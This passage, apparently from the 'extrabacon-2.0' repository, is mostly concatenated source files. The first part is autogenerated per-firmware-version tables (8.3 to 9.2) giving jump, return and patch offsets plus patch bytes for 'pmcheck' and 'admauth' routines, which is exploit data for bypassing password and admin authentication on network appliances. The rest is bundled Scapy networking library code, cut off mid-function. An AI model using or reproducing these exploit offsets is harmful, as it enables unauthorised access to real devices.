| 16 | 17 | # "8.3(2)39" = ["143.212.14.8","124.48.196.8","88","0.128.59.9","176.136.59.9","85.49.192.137","0.224.6.8","32.228.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(2)40.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2)40 4 | ## 5 | 6 | jmp_esp_offset = "169.151.13.8" 7 | saferet_offset = "124.48.196.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.59.9" 10 | pmcheck_offset = "48.137.59.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.224.6.8" 13 | admauth_offset = "32.228.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(2)40" = 
["169.151.13.8","124.48.196.8","88","0.128.59.9","48.137.59.9","85.49.192.137","0.224.6.8","32.228.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(1) 4 | ## 5 | 6 | jmp_esp_offset = "173.58.17.9" 7 | saferet_offset = "6.12.219.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.72.9" 10 | pmcheck_offset = "240.252.72.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.48.8.8" 13 | admauth_offset = "144.56.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(1)" = ["173.58.17.9","6.12.219.8","72","0.240.72.9","240.252.72.9","85.49.192.137","0.48.8.8","144.56.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(2) 4 | ## 5 | 6 | jmp_esp_offset = "25.71.20.9" 7 | saferet_offset = "230.222.223.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.128.83.9" 10 | pmcheck_offset = "240.143.83.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "224.19.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(2)" = ["25.71.20.9","230.222.223.8","72","0.128.83.9","240.143.83.9","85.49.192.137","0.16.8.8","224.19.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(3) 4 | ## 5 | 6 | jmp_esp_offset = "13.178.7.8" 7 | saferet_offset = "150.219.224.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.84.9" 10 | pmcheck_offset = "208.207.84.9" 11 | 
pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "208.23.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(3)" = ["13.178.7.8","150.219.224.8","72","0.192.84.9","208.207.84.9","85.49.192.137","0.16.8.8","208.23.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4) 4 | ## 5 | 6 | jmp_esp_offset = "111.198.161.9" 7 | saferet_offset = "181.105.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.85.9" 10 | pmcheck_offset = "240.201.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "176.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)" = ["111.198.161.9","181.105.226.8","72","0.192.85.9","240.201.85.9","85.49.192.137","0.16.8.8","176.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)1.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)1 4 | ## 5 | 6 | jmp_esp_offset = "253.74.114.8" 7 | saferet_offset = "150.236.225.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.85.9" 10 | pmcheck_offset = "176.202.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "176.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)1" = ["253.74.114.8","150.236.225.8","72","0.192.85.9","176.202.85.9","85.49.192.137","0.16.8.8","176.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)3.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 
8.4(4)3 4 | ## 5 | 6 | jmp_esp_offset = "164.119.8.8" 7 | saferet_offset = "102.0.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.85.9" 10 | pmcheck_offset = "96.252.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)3" = ["164.119.8.8","102.0.226.8","72","0.240.85.9","96.252.85.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)5.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)5 4 | ## 5 | 6 | jmp_esp_offset = "202.250.13.8" 7 | saferet_offset = "246.48.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.64.86.9" 10 | pmcheck_offset = "16.69.86.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)5" = ["202.250.13.8","246.48.226.8","72","0.64.86.9","16.69.86.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)9.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)9 4 | ## 5 | 6 | jmp_esp_offset = "173.23.5.8" 7 | saferet_offset = "166.113.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.144.86.9" 10 | pmcheck_offset = "224.154.86.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)9" = ["173.23.5.8","166.113.226.8","72","0.144.86.9","224.154.86.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- 
/extrabacon-2.0/improved/shellcode_8_4(6)5.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(6)5 4 | ## 5 | 6 | jmp_esp_offset = "125.63.32.8" 7 | saferet_offset = "166.11.228.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.176.88.9" 10 | pmcheck_offset = "96.186.88.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "240.33.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(6)5" = ["125.63.32.8","166.11.228.8","72","0.176.88.9","96.186.88.9","85.49.192.137","0.32.8.8","240.33.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(7).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(7) 4 | ## 5 | 6 | jmp_esp_offset = "109.22.18.8" 7 | saferet_offset = "70.254.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.144.87.9" 10 | pmcheck_offset = "80.156.87.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "0.34.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(7)" = ["109.22.18.8","70.254.226.8","72","0.144.87.9","80.156.87.9","85.49.192.137","0.32.8.8","0.34.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_0(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.0(1) 4 | ## 5 | 6 | jmp_esp_offset = "221.227.27.8" 7 | saferet_offset = "134.13.3.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.176.126.9" 10 | pmcheck_offset = "112.182.126.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "240.45.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.0(1)" = 
["221.227.27.8","134.13.3.9","72","0.176.126.9","112.182.126.9","85.49.192.137","0.32.8.8","240.45.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_1(1)4.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.1(1)4 4 | ## 5 | 6 | jmp_esp_offset = "173.250.27.8" 7 | saferet_offset = "134.177.3.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.112.127.9" 10 | pmcheck_offset = "176.119.127.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.48.8.8" 13 | admauth_offset = "96.49.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.1(1)4" = ["173.250.27.8","134.177.3.9","72","0.112.127.9","176.119.127.9","85.49.192.137","0.48.8.8","96.49.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(1) 4 | ## 5 | 6 | jmp_esp_offset = "197.180.10.8" 7 | saferet_offset = "54.118.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.182.9" 10 | pmcheck_offset = "16.252.182.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "176.84.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(1)" = ["197.180.10.8","54.118.39.9","72","0.240.182.9","16.252.182.9","85.49.192.137","0.80.8.8","176.84.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(2)8.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(2)8 4 | ## 5 | 6 | jmp_esp_offset = "21.187.10.8" 7 | saferet_offset = "54.245.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.183.9" 10 | pmcheck_offset = 
"16.252.183.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "64.90.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(2)8" = ["21.187.10.8","54.245.39.9","72","0.240.183.9","16.252.183.9","85.49.192.137","0.80.8.8","64.90.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(3) 4 | ## 5 | 6 | jmp_esp_offset = "29.112.29.8" 7 | saferet_offset = "134.115.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.128.183.9" 10 | pmcheck_offset = "16.128.183.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "64.90.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(3)" = ["29.112.29.8","134.115.39.9","72","0.128.183.9","16.128.183.9","85.49.192.137","0.80.8.8","64.90.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(4) 4 | ## 5 | 6 | jmp_esp_offset = "101.190.10.8" 7 | saferet_offset = "54.209.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.48.184.9" 10 | pmcheck_offset = "192.52.184.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "0.91.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(4)" = ["101.190.10.8","54.209.39.9","72","0.48.184.9","192.52.184.9","85.49.192.137","0.80.8.8","0.91.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(4)13.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 
9.2(4)13 4 | ## 5 | 6 | jmp_esp_offset = "197.207.10.8" 7 | saferet_offset = "70.97.40.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.16.185.9" 10 | pmcheck_offset = "240.30.185.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "240.95.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(4)13" = ["197.207.10.8","70.97.40.9","72","0.16.185.9","240.30.185.9","85.49.192.137","0.80.8.8","240.95.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | if __name__ == "__main__": 9 | from scapy.main import interact 10 | interact() 11 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | from base_classes import * 8 | from config import * 9 | from dadict import * 10 | from data import * 11 | from error import * 12 | from themes import * 13 | from arch import * 14 | 15 | from plist import * 16 | from fields import * 17 | from packet import * 18 | from asn1fields import * 19 | from asn1packet import * 20 | 21 | from utils import * 22 | from route import * 23 | if conf.ipv6_enabled: 24 | from utils6 import * 25 | from route6 import * 26 | from sendrecv import * 27 | from supersocket import * 28 | from volatile import * 29 | from as_resolvers import * 30 | 31 | from ansmachine import * 32 | from automaton import * 
33 | from autorun import * 34 | 35 | from main import * 36 | 37 | from layers.all import * 38 | 39 | from asn1.asn1 import * 40 | from asn1.ber import * 41 | from asn1.mib import * 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/ansmachine.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | ######################## 7 | ## Answering machines ## 8 | ######################## 9 | 10 | from sendrecv import send,sendp,sniff 11 | from config import conf 12 | from error import log_interactive 13 | 14 | class ReferenceAM(type): 15 | def __new__(cls, name, bases, dct): 16 | o = super(ReferenceAM, cls).__new__(cls, name, bases, dct) 17 | if o.function_name: 18 | globals()[o.function_name] = lambda o=o,*args,**kargs: o(*args,**kargs)() 19 | return o 20 | 21 | 22 | class AnsweringMachine(object): 23 | __metaclass__ = ReferenceAM 24 | function_name = "" 25 | filter = None 26 | sniff_options = { "store":0 } 27 | sniff_options_list = [ "store", "iface", "count", "promisc", "filter", "type", "prn" ] 28 | send_options = { "verbose":0 } 29 | send_options_list = ["iface", "inter", "loop", "verbose"] 30 | send_function = staticmethod(send) 31 | 32 | 33 | def __init__(self, **kargs): 34 | self.mode = 0 35 | if self.filter: 36 | kargs.setdefault("filter",self.filter) 37 | kargs.setdefault("prn", self.reply) 38 | self.optam1 = {} 39 | self.optam2 = {} 40 | self.optam0 = {} 41 | doptsend,doptsniff = self.parse_all_options(1, kargs) 42 | self.defoptsend = self.send_options.copy() 43 | self.defoptsend.update(doptsend) 44 | self.defoptsniff = self.sniff_options.copy() 45 | self.defoptsniff.update(doptsniff) 46 | self.optsend,self.optsniff = [{},{}] 47 | 48 | def __getattr__(self, attr): 
49 | for d in [self.optam2, self.optam1]: 50 | if attr in d: 51 | return d[attr] 52 | raise AttributeError,attr 53 | 54 | def __setattr__(self, attr, val): 55 | mode = self.__dict__.get("mode",0) 56 | if mode == 0: 57 | self.__dict__[attr] = val 58 | else: 59 | [self.optam1, self.optam2][mode-1][attr] = val 60 | 61 | def parse_options(self): 62 | pass 63 | 64 | def parse_all_options(self, mode, kargs): 65 | sniffopt = {} 66 | sendopt = {} 67 | for k in kargs.keys(): 68 | if k in self.sniff_options_list: 69 | sniffopt[k] = kargs[k] 70 | if k in self.send_options_list: 71 | sendopt[k] = kargs[k] 72 | if k in self.sniff_options_list+self.send_options_list: 73 | del(kargs[k]) 74 | if mode != 2 or kargs: 75 | if mode == 1: 76 | self.optam0 = kargs 77 | elif mode == 2 and kargs: 78 | k = self.optam0.copy() 79 | k.update(kargs) 80 | self.parse_options(**k) 81 | kargs = k 82 | omode = self.__dict__.get("mode",0) 83 | self.__dict__["mode"] = mode 84 | self.parse_options(**kargs) 85 | self.__dict__["mode"] = omode 86 | return sendopt,sniffopt 87 | 88 | def is_request(self, req): 89 | return 1 90 | 91 | def make_reply(self, req): 92 | return req 93 | 94 | def send_reply(self, reply): 95 | self.send_function(reply, **self.optsend) 96 | 97 | def print_reply(self, req, reply): 98 | print "%s ==> %s" % (req.summary(),reply.summary()) 99 | 100 | def reply(self, pkt): 101 | if not self.is_request(pkt): 102 | return 103 | reply = self.make_reply(pkt) 104 | self.send_reply(reply) 105 | if conf.verb >= 0: 106 | self.print_reply(pkt, reply) 107 | 108 | def run(self, *args, **kargs): 109 | log_interactive.warning("run() method deprecated. 
The intance is now callable") 110 | self(*args,**kargs) 111 | 112 | def __call__(self, *args, **kargs): 113 | optsend,optsniff = self.parse_all_options(2,kargs) 114 | self.optsend=self.defoptsend.copy() 115 | self.optsend.update(optsend) 116 | self.optsniff=self.defoptsniff.copy() 117 | self.optsniff.update(optsniff) 118 | 119 | try: 120 | self.sniff() 121 | except KeyboardInterrupt: 122 | print "Interrupted by user" 123 | 124 | def sniff(self): 125 | sniff(**self.optsniff) 126 | 127 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | import sys,os,socket 8 | from scapy.error import * 9 | import scapy.config 10 | 11 | try: 12 | import Gnuplot 13 | GNUPLOT=1 14 | except ImportError: 15 | log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.") 16 | GNUPLOT=0 17 | 18 | try: 19 | import pyx 20 | PYX=1 21 | except ImportError: 22 | log_loading.info("Can't import PyX. 
Won't be able to use psdump() or pdfdump().") 23 | PYX=0 24 | 25 | 26 | def str2mac(s): 27 | return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 28 | 29 | 30 | 31 | def get_if_addr(iff): 32 | return socket.inet_ntoa(get_if_raw_addr(iff)) 33 | 34 | def get_if_hwaddr(iff): 35 | addrfamily, mac = get_if_raw_hwaddr(iff) 36 | if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]: 37 | return str2mac(mac) 38 | else: 39 | raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff)) 40 | 41 | 42 | LINUX=sys.platform.startswith("linux") 43 | OPENBSD=sys.platform.startswith("openbsd") 44 | FREEBSD=sys.platform.startswith("freebsd") 45 | NETBSD = sys.platform.startswith("netbsd") 46 | DARWIN=sys.platform.startswith("darwin") 47 | SOLARIS=sys.platform.startswith("sunos") 48 | WINDOWS=sys.platform.startswith("win32") 49 | 50 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64') 51 | 52 | 53 | # Next step is to import following architecture specific functions: 54 | # def get_if_raw_hwaddr(iff) 55 | # def get_if_raw_addr(iff): 56 | # def get_if_list(): 57 | # def get_working_if(): 58 | # def attach_filter(s, filter): 59 | # def set_promisc(s,iff,val=1): 60 | # def read_routes(): 61 | # def get_if(iff,cmd): 62 | # def get_if_index(iff): 63 | 64 | 65 | 66 | if LINUX: 67 | from linux import * 68 | if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet: 69 | from pcapdnet import * 70 | elif OPENBSD or FREEBSD or NETBSD or DARWIN: 71 | from bsd import * 72 | elif SOLARIS: 73 | from solaris import * 74 | elif WINDOWS: 75 | from windows import * 76 | 77 | if scapy.config.conf.iface is None: 78 | scapy.config.conf.iface = LOOPBACK_NAME 79 | 80 | 81 | def get_if_raw_addr6(iff): 82 | """ 83 | Returns the main global unicast address associated with provided 84 | interface, in network format. If no global address is found, None 85 | is returned. 
86 | """ 87 | r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr()) 88 | if len(r) == 0: 89 | return None 90 | else: 91 | r = r[0][0] 92 | return inet_pton(socket.AF_INET6, r) 93 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/bsd.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | LOOPBACK_NAME="lo0" 9 | 10 | from unix import * 11 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/solaris.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | # IPPROTO_GRE is missing on Solaris 8 | import socket 9 | socket.IPPROTO_GRE = 47 10 | 11 | LOOPBACK_NAME="lo0" 12 | 13 | from unix import * 14 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/as_resolvers.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket 7 | from config import conf 8 | 9 | class AS_resolver: 10 | server = None 11 | options = "-k" 12 | def __init__(self, server=None, port=43, options=None): 13 | if server is not None: 14 | self.server = server 15 | self.port = port 16 | if options is not None: 17 | self.options = options 18 | 19 | def _start(self): 20 | self.s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | self.s.connect((self.server,self.port)) 22 | if self.options: 23 | self.s.send(self.options+"\n") 24 | self.s.recv(8192) 25 | def _stop(self): 26 | self.s.close() 27 | 28 | def _parse_whois(self, txt): 29 | asn,desc = None,"" 30 | for l in txt.splitlines(): 31 | if not asn and l.startswith("origin:"): 32 | asn = l[7:].strip() 33 | if l.startswith("descr:"): 34 | if desc: 35 | desc += r"\n" 36 | desc += l[6:].strip() 37 | if asn is not None and desc: 38 | break 39 | return asn,desc.strip() 40 | 41 | def _resolve_one(self, ip): 42 | self.s.send("%s\n" % ip) 43 | x = "" 44 | while not ("%" in x or "source" in x): 45 | x += self.s.recv(8192) 46 | asn, desc = self._parse_whois(x) 47 | return ip,asn,desc 48 | def resolve(self, *ips): 49 | self._start() 50 | ret = [] 51 | for ip in ips: 52 | ip,asn,desc = self._resolve_one(ip) 53 | if asn is not None: 54 | ret.append((ip,asn,desc)) 55 | self._stop() 56 | return ret 57 | 58 | class AS_resolver_riswhois(AS_resolver): 59 | server = "riswhois.ripe.net" 60 | options = "-k -M -1" 61 | 62 | 63 | class AS_resolver_radb(AS_resolver): 64 | server = "whois.ra.net" 65 | options = "-k -M" 66 | 67 | 68 | class AS_resolver_cymru(AS_resolver): 69 | server = "whois.cymru.com" 70 | options = None 71 | def resolve(self, *ips): 72 | ASNlist = [] 73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 74 | s.connect((self.server,self.port)) 75 | s.send("begin\r\n"+"\r\n".join(ips)+"\r\nend\r\n") 76 | r = "" 77 | while 1: 78 | l = s.recv(8192) 79 | if l == "": 80 | break 81 | r += l 82 | s.close() 83 | for l in r.splitlines()[1:]: 84 | if "|" not in l: 85 | continue 86 | asn,ip,desc = map(str.strip, l.split("|")) 87 | if asn == "NA": 88 | continue 89 | asn = int(asn) 90 | ASNlist.append((ip,asn,desc)) 91 | return ASNlist 92 | 93 | class AS_resolver_multi(AS_resolver): 94 | resolvers_list = ( AS_resolver_cymru(),AS_resolver_riswhois(),AS_resolver_radb() ) 95 | def __init__(self, 
*reslist): 96 | if reslist: 97 | self.resolvers_list = reslist 98 | def resolve(self, *ips): 99 | todo = ips 100 | ret = [] 101 | for ASres in self.resolvers_list: 102 | res = ASres.resolve(*todo) 103 | resolved = [ ip for ip,asn,desc in res ] 104 | todo = [ ip for ip in todo if ip not in resolved ] 105 | ret += res 106 | return ret 107 | 108 | 109 | conf.AS_resolver = AS_resolver_multi() 110 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | # We do not import mib.py because it is more bound to scapy and 7 | # less prone to be used in a standalone fashion 8 | __all__ = ["asn1","ber"] 9 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1/mib.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import re 7 | from glob import glob 8 | from scapy.dadict import DADict,fixname 9 | from scapy.config import conf 10 | from scapy.utils import do_graph 11 | 12 | ################# 13 | ## MIB parsing ## 14 | ################# 15 | 16 | _mib_re_integer = re.compile("^[0-9]+$") 17 | _mib_re_both = re.compile("^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$") 18 | _mib_re_oiddecl = re.compile("$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}",re.M) 19 | _mib_re_strings = re.compile('"[^"]*"') 20 | _mib_re_comments = re.compile('--.*(\r|\n)') 21 | 22 | class MIBDict(DADict): 23 | def _findroot(self, x): 24 | if x.startswith("."): 
25 | x = x[1:] 26 | if not x.endswith("."): 27 | x += "." 28 | max=0 29 | root="." 30 | for k in self.keys(): 31 | if x.startswith(self[k]+"."): 32 | if max < len(self[k]): 33 | max = len(self[k]) 34 | root = k 35 | return root, x[max:-1] 36 | def _oidname(self, x): 37 | root,remainder = self._findroot(x) 38 | return root+remainder 39 | def _oid(self, x): 40 | xl = x.strip(".").split(".") 41 | p = len(xl)-1 42 | while p >= 0 and _mib_re_integer.match(xl[p]): 43 | p -= 1 44 | if p != 0 or xl[p] not in self: 45 | return x 46 | xl[p] = self[xl[p]] 47 | return ".".join(xl[p:]) 48 | def _make_graph(self, other_keys=[], **kargs): 49 | nodes = [(k,self[k]) for k in self.keys()] 50 | oids = [self[k] for k in self.keys()] 51 | for k in other_keys: 52 | if k not in oids: 53 | nodes.append(self.oidname(k),k) 54 | s = 'digraph "mib" {\n\trankdir=LR;\n\n' 55 | for k,o in nodes: 56 | s += '\t"%s" [ label="%s" ];\n' % (o,k) 57 | s += "\n" 58 | for k,o in nodes: 59 | parent,remainder = self._findroot(o[:-1]) 60 | remainder = remainder[1:]+o[-1] 61 | if parent != ".": 62 | parent = self[parent] 63 | s += '\t"%s" -> "%s" [label="%s"];\n' % (parent, o,remainder) 64 | s += "}\n" 65 | do_graph(s, **kargs) 66 | def __len__(self): 67 | return len(self.keys()) 68 | 69 | 70 | def mib_register(ident, value, the_mib, unresolved): 71 | if ident in the_mib or ident in unresolved: 72 | return ident in the_mib 73 | resval = [] 74 | not_resolved = 0 75 | for v in value: 76 | if _mib_re_integer.match(v): 77 | resval.append(v) 78 | else: 79 | v = fixname(v) 80 | if v not in the_mib: 81 | not_resolved = 1 82 | if v in the_mib: 83 | v = the_mib[v] 84 | elif v in unresolved: 85 | v = unresolved[v] 86 | if type(v) is list: 87 | resval += v 88 | else: 89 | resval.append(v) 90 | if not_resolved: 91 | unresolved[ident] = resval 92 | return False 93 | else: 94 | the_mib[ident] = resval 95 | keys = unresolved.keys() 96 | i = 0 97 | while i < len(keys): 98 | k = keys[i] 99 | if mib_register(k,unresolved[k], 
